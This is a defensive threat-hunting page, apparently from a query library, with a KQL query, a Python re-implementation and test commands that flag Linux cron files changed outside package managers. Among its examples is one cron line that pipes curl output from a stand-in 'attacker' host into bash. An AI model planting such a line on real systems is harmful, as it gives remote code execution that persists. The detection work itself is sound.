Query Details

Linux Suspicious Cron Persistence

Query

## Linux – Suspicious Cron Persistence – Last 7d

### Query name

**`Linux – Suspicious cron persistence – last 7d`**

### Purpose

Identifies **cron files created or modified by non‑package‑management processes**, which is a strong indicator of:

* Manual persistence
* Script‑based backdoors
* Red team activity
* Post‑exploitation footholds

The query intentionally filters out expected system behaviour (such as `apt` or `dpkg`) to reduce noise.

---

### Query

```kql
let LinuxDeviceIds =
    DeviceInfo
    | where OSPlatform == "Linux"
    | distinct DeviceId;
DeviceFileEvents
| where DeviceId in (LinuxDeviceIds)
| where Timestamp > ago(7d)
| where FolderPath has_any ("/etc/cron", "/var/spool/cron")
| where InitiatingProcessFileName !in (
    "dpkg",
    "apt",
    "apt-get",
    "yum",
    "dnf"
)
| project
    Timestamp,
    DeviceName,
    ActionType,
    FileName,
    FolderPath,
    InitiatingProcessFileName,
    InitiatingProcessCommandLine
| order by Timestamp desc
```

---

### Why this query works well on Linux

Linux attackers rarely invent exotic persistence mechanisms. Instead, they rely on **simple, durable techniques** such as:

* Adding cron jobs
* Modifying existing scheduled tasks
* Dropping scripts that cron executes

By excluding package managers, this query focuses on **human‑ or script‑driven changes**, which dramatically improves signal quality.

---

### Typical malicious or suspicious activity this will surface

* Cron jobs created using `bash`, `sh`, or scripting tools
* Scheduled execution of payloads in `/tmp` or home directories
* Red team persistence mechanisms
* Backdoors that periodically beacon or re‑establish access

Examples include:

* `* * * * * curl http://attacker | bash`
* Hidden cron entries created by shell scripts
* Persistence established immediately after SSH access
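As an added example (not part of the original page or its query), the filter chain of the KQL above re-implemented in Python over constructed DeviceFileEvents-style records, plus a small triage helper for the indicators listed in this section; the device IDs, the fixed clock and the sample command lines are all assumptions.

```python
from datetime import datetime, timedelta, timezone

# Mirrors the query's constants: watched cron locations and the excluded package managers.
CRON_PATHS = ("/etc/cron", "/var/spool/cron")
PACKAGE_MANAGERS = {"dpkg", "apt", "apt-get", "yum", "dnf"}
NOW = datetime(2026, 2, 2, tzinfo=timezone.utc)  # fixed clock so the sample is reproducible

def ev(hours_ago, device_id, folder, fname, proc, cmdline):
    """Build one DeviceFileEvents-style record (constructed sample, not real telemetry)."""
    return {"Timestamp": NOW - timedelta(hours=hours_ago), "DeviceId": device_id,
            "FolderPath": folder, "FileName": fname,
            "InitiatingProcessFileName": proc, "InitiatingProcessCommandLine": cmdline}

LINUX_DEVICE_IDS = {"dev-linux-01", "dev-linux-02"}  # stands in for the DeviceInfo subquery
EVENTS = [
    ev(3, "dev-linux-01", "/etc/cron.d", "update", "bash",
       "bash -c \"echo '* * * * * /tmp/.x/run.sh' > /etc/cron.d/update\""),        # hit
    ev(30, "dev-linux-02", "/var/spool/cron/crontabs", "svc", "crontab", "crontab -"),  # hit
    ev(26, "dev-linux-01", "/etc/cron.daily", "logrotate", "dpkg", "dpkg --configure -a"),  # excluded initiator
    ev(240, "dev-linux-01", "/etc/cron.d", "old", "sh", "sh -c 'cat > /etc/cron.d/old'"),  # older than 7d
    ev(5, "dev-win-01", "/etc/cron.d", "x", "bash", "bash"),                         # not a Linux device
    ev(2, "dev-linux-02", "/home/svc", ".bashrc", "vim", "vim .bashrc"),             # not a cron path
]

def suspicious_cron_changes(events, linux_device_ids, now=NOW, window=timedelta(days=7)):
    """Apply the query's four filters and sort newest first, like `order by Timestamp desc`."""
    hits = [
        e for e in events
        if e["DeviceId"] in linux_device_ids                        # DeviceId in (LinuxDeviceIds)
        and e["Timestamp"] > now - window                           # Timestamp > ago(7d)
        and any(p in e["FolderPath"] for p in CRON_PATHS)           # substring stand-in for has_any
        and e["InitiatingProcessFileName"] not in PACKAGE_MANAGERS  # !in is case-sensitive, as in KQL
    ]
    return sorted(hits, key=lambda e: e["Timestamp"], reverse=True)

def triage_tags(cmdline):
    """Cheap triage hints from the examples above: payload staged in /tmp or a home
    directory, or a downloader piped straight into a shell."""
    tags = set()
    if "/tmp/" in cmdline or "/home/" in cmdline:
        tags.add("payload-in-tmp-or-home")
    if ("curl " in cmdline or "wget " in cmdline) and "|" in cmdline:
        tags.add("download-piped-to-shell")
    return tags

if __name__ == "__main__":
    for hit in suspicious_cron_changes(EVENTS, LINUX_DEVICE_IDS):
        print(hit["Timestamp"].isoformat(), hit["DeviceId"],
              hit["FolderPath"] + "/" + hit["FileName"], hit["InitiatingProcessFileName"],
              sorted(triage_tags(hit["InitiatingProcessCommandLine"])))
```

Only the two `bash`/`crontab`-initiated changes survive the filters; the `dpkg` write, the ten-day-old event, the non-Linux device and the non-cron path are dropped exactly as the KQL drops them.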

---

### Expected benign activity (and why it’s filtered)

Common benign cron changes are usually made by:

* `dpkg`
* `apt` / `apt-get`
* `yum` / `dnf`

These typically occur during:

* Package installation
* System updates
* Maintenance tasks

By excluding these processes, the query avoids alerting on normal OS maintenance.

---

### When to use this query

Use this query when:

* Investigating suspected Linux compromise
* Validating persistence after red team activity
* Hunting for low‑and‑slow backdoors
* Reviewing post‑exploitation behaviour

It is especially effective on **servers**, where cron changes should be rare and intentional.

---

### Testing and validation guidance

To safely test this query, you can create a temporary cron entry:

```bash
(crontab -l 2>/dev/null; echo "* * * * * echo cron-test >> /tmp/cron-test.log") | crontab -
```

After confirming the event appears in Advanced Hunting, remove the cron job:

```bash
# Remove only the test entry; `crontab -r` would wipe every job in the user's crontab
crontab -l 2>/dev/null | grep -v 'cron-test' | crontab -
rm -f /tmp/cron-test.log
```

Explanation

This query is designed to detect suspicious cron job activities on Linux systems over the past seven days. It specifically looks for cron files that have been created or modified by processes other than common package management tools like apt, dpkg, yum, or dnf. These package managers are typically responsible for legitimate system updates and maintenance, so excluding them helps focus on potentially malicious activities.

The query identifies activities such as:

  • Manual persistence efforts
  • Script-based backdoors
  • Red team activities
  • Post-exploitation footholds

By filtering out expected system behavior, the query aims to highlight human- or script-driven changes, which are often indicative of malicious intent. Examples of suspicious activities include cron jobs created by shell scripts, scheduled execution of payloads, or hidden cron entries.

This query is particularly useful when investigating potential Linux compromises, validating persistence mechanisms after red team exercises, or hunting for subtle backdoors. It is most effective on servers, where cron changes should be rare and deliberate.

To test the query, you can create a temporary cron job and verify its detection, then remove it afterward.

Details


Nathan Hutchinson

Released: February 2, 2026

Tables

DeviceInfo, DeviceFileEvents

Keywords

Linux, Devices, DeviceInfo, DeviceFileEvents, DeviceId, DeviceName, ActionType, FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine, Timestamp

Operators

let, |, where, ==, distinct, in, >, ago, has_any, !in, project, order by, desc
